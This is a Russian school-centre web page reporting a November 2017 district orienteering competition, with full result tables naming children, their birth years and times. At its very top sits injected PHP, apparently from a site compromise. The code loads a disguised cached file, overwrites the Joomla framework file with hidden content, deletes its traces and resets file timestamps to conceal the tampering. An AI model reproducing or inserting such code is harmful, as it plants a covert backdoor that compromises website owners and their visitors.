$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Соревнования по спортивному ориентированию
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы оставлять комментарии в гостевой книге



Спасибо за регистрацию

Ссылки

План мероприятий

Декабрь 2017
Пн Вт Ср Чт Пт Сб Вс
27 28 29 30 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Developed by JoomVision.com
Баннер
  • Toggle
  • Закрыть

Соревнования по спортивному ориентированию PDF Печать E-mail

      11 ноября 2017 года на базе МОБУ «Землянская ООШ» Новосергиевского района, организаторами МАУДО ДДТ и МОБУ «Землянская ООШ», прошли районные соревнования по спортивному ориентированию бегом.

В соревновании приняли участие 6 школ: МОБУ «Барабановская СОШ». «Платовская СОШ им. А.Матросова», «Кувайская СОШ», «Сузановская СОШ, «Землянская ООШ» и МОАУ «Кулагинская СОШ» в количестве 71 человек. Участники соревновались в трёх возрастных группах, на дистанции от 2 до 4 км с шестью контрольными пунктами.

 

11

      

Победителями в своих возрастных группах стали:


2005г.р. и моложе Ткаченко Милена из Кулагино и Бородин Леонид из Землянки.

2003-2004г.р. Хасанова Анастасия и Кубасов Владислав из Платовки.

2002г.р. и старше Семёнова Дарья и Бородин Данил из Землянки.

Результаты соревнований прилагаются.

 

 

Протокол

соревнований по спортивному ориентированию среди девочек 2005г.р. и моложе с. Землянка 11.11.2017г.

 

п\п

Фамилия, имя

Год рождения

Команда

Время старта

Время финиша

Чистое

время

Найдено КП

Место

1

Щербакова Анастасия

2005

Барабановка

01:00

01:20:46

01:19:46

6

6

2

Лисова Татьяна

2006

Барабановка

02:00

01:24:25

01:22:25

6

7

3

Лупандина Екатерина

2005

Кулагино

03:00

01:21:32

01:18:32

6

5

4

Добрынина Елизавета

2005

Кулагино

04:00

01:21:36

01:17:36

6

4

5

Лупандина Валерия

2009

Кулагино

05:00

01:21:15

01:16:15

5

Снята

6

Пятина Дарья

2009

Кулагино

06:00

01:21:36

01:15:36

6

2

7

Ткаченко Милена

2007

Кулагино

07:00

01:22:00

01:15:00

6

1

8

Фаттахова Азалия

2005

Сузаново

08:00

01:24:05

01:16:05

6

3

9

Уразаева Злата

2006

Платовка

10:00

01:40:05

01:30:05

5

Снята

10

Чуйкова Ксения

2007

Платовка

11:00

02:11:50

02:00:50

4

Снята

11

Шубина Елизавета

2007

Платовка

12:00

02:11:51

01:59:51

4

Снята

12

Рыбкина Влада

2007

Платовка

13:00

 

 

 

Снята

13

Корчагина Александра

2008

Платовка

14:00

02:11:42

01:57:42

4

Снята

14

Соловьёва Дарья

2007

Платовка

15:00

02:00:20

01:45:20

5

Снята

15

Клеймёнова Дарья

2008

Землянка

16:00

02:03:49

01:47:49

6

10

16

Снегирёва Ангелина

2006

Кувай

17:00

02:03:11

01:46:11

6

9

17

Назарова Ульяна

2006

Кувай

18:30

02:03:06

01:44:36

6

8

 

 

Протокол

соревнований по спортивному ориентированию среди мальчиков 2005г.р. и моложе с. Землянка   11.11.2017г

 

п\п

Фамилия, имя

Год рождения

Команда

Время старта

Время финиша

Чистое

время

Найдено КП

Место

1

Жанаев Айрат

2006

Барабановка

01:00

01:57:49

01:56:49

3

Снят

2

Астафьев Максим

2005

Барабановка

02:00

56:45

54:45

6

9

3

Пыхин Иван

2005

Кулагино

03:00

57:20

54:20

6

8

4

Никитин Данил

2005

Кулагино

04:00

57:21

53:21

6

7

5

Аноха Леонид

2005

Сузаново

05:00

47:15

42:15

2

Снят

6

Фёдоров Роман

2007

Платовка

06:00

01:57:50

01:51:50

3

Снят

7

Койструб Дмитрий

2008

Платовка

07:00

57:42

50:42

6

6

8

Филатов Станислав

2007

Платовка

08:00

56:55

48:55

6

5

9

Дедов Артём

2005

Платовка

09:00

01:44:54

01:35:54

6

11

10

Жданов Даниил

2008

Землянка

10:00

46:45

36:45

6

4

11

Шумаев Денис

2006

Землянка

11:00

28:45

17:45

6

3

12

Клеймёнов Даниил

2005

Землянка

12:00

26:24

14:24

6

2

13

Бородин Леонид

2008

Землянка

13:00

26:14

13:14

6

1

14

Иштуганов Айдар

2006

Кувай

14:00

02:03:10

01:49:10

6

12

15

Кутлиахметов Фаиль

2006

Кувай

16:00

01:19:20

01:03:20

6

10

16

Чубов Богдан

2006

Сузаново

16:00

01:26:45

01:10:45

3

Снят

 

 

Протокол

соревнований по спортивному ориентированию среди девушек 2003-2004 г.р. с. Землянка 11.11.2017г.

 

п\п

Фамилия, имя

Год рождения

Команда

Время старта

Время финиша

Чистое

 время

Найдено

КП

Место

1

Толкачёва Лидия

2004

Барабановка

01:00

 

 

 

Снята

2

Куликова Снежана

2003

Кулагино

02:00

01:28:37

01:26:37

6

3

3

Пятина Елена

2003

Кулагино

03:00

01:28:35

01:25:35

6

2

4

Уразаева Юлия

2003

Платовка

04:00

02:00:39

01:56:39

3

Снята

5

Хасанова Анастасия

2003

Платовка

05:00

51:43

46:43

6

1

6

Бижанова Анжела

2004

Кувай

06:00

02:11:00

02:05:00

3

Снята

7

Кутлиахметова Эльвира

2004

Кувай

07:00

02:11:00

02:04:00

3

Снята

8

Семёнова Татьяна

2003

Кувай

08:00

02:11:00

02:03:00

3

Снята

9

Буткевич Дарья

2004

Сузаново

09:00

01:40:38

01:31:38

3

Снята

10

Коровина Екатериа

2004

Сузаново

10:00

01:52:38

01:42:38

3

Снята

11

Позднякова Нина

2004

Сузаново

11:00

02:00:50

01:49:50

3

Снята


 

Протокол

соревнований по спортивному ориентированию среди юношей 2003-2004г.р. с. Землянка 11.11.2017г.

 

п\п

Фамилия, имя

Год рождения

Команда

Время старта

Время финиша

Чистое

время

Найдено

       КП

Место

1

Щербаков Денис

2004

Барабановка

01:00

01:03:35

01:02:35

6

8

2

Суров Александр

2004

Барабановка

02:00

01:03:36

01:01:36

6

7

3

Манасов Руслан

2003

Барабановка

03:00

01:35:35

01:32:35

6

12

4

Кулаков Денис

2003

Барабановка

04:00

01:08:05

01:04:05

6

10

5

Пятин Александр

2004

Кулагино

05:00

01:03:07

58:07

6

6

6

Куликов Виталий

2003

Кулагино

06:00

57:31

51:31

6

4

7

Мананников Сергей

2003

Кулагино

07:00

57:31

50:31

6

3

8

Кубасов Владислав

2003

Платовка

08:00

51:40

43:40

6

1

9

Семёнов Станислав

2004

Землянка

09:00

54:05

45:05

6

2

10

Назаров Кирилл

2004

Кувай

10:00

01:15:30

01:05:30

6

11

11

Сайтаков Наиль

2004

Кувай

11:00

01:03:06

52:06

6

5

12

Майоров Денис

2003

Кувай

12:00

01:15:26

01:03:26

6

9

13

Ижока Вадим

2003

Сузаново

13:00

01:20:56

01:07:56

2

Снят

14

Фаттахов Айдар

2003

Сузаново

14:00

01:20:56

01:06:56

2

Снят

 

 

Протокол

соревнований по спортивному ориентированию среди девушек 2002г.р. и старше. с.Землянка 11.11.2017г.

 

п\п

Фамилия, имя

Год рождения

Команда

Время старта

Время финиша

Чистое

время

Найдено

       КП

Место

1

Агаршева Наталья

2002

Платовка

20:00

01:15:44

55:44

6

3

2

Семёнова Дарья

1999

Землянка

21:00

01:05:42

44:42

6

1

3

Шалимова Радмила

2002

Кувай

22:00

02:11:00

49:00

6

Снята

4

Лупандина Анна

2002

Кулагино

23:00

01:17:57

54:57

6

2


 

Протокол

соревнований по спортивному ориентированию среди юношей 2002г.р. и старше. с. Землянка 11.11.2017г.

 

п\п

Фамилия, имя

Год рождения

Команда

Время старта

Время финиша

Чистое

время

Найдено

       КП

Место

1

Кузмин Рамиль

2002

Кулагино

20:00

01:05:25

45:25

6

8

2

Шипилов Сергей

2001

Кулагино

21:00

01:05:22

44:22

6

6

3

Капишников Данил

2001

Кулагино

22:00

53:46

31:46

6

3

4

Павлов Данил

2002

Платовка

23:00

01:05:35

43:35

6

5

5

Семёнов Антон

2002

Кувай

24:00

01:08:29

44:29

6

7

6

Ижока Андрей

2003

Сузаново

25:00

01:08:31

37:31

6

4

7

Бородин Олег

2001

Землянка

26:00

50:35

24:35

6

2

8

Бородин Данил

1997

Землянка

27:00

50:35

23:35

6

1

9

Бородин Леонид

2008

Землянка

28:00

01:05:20

37:20

6

В.К.


 

comback_black_green_75

 
Обновлено 23.11.2017 17:50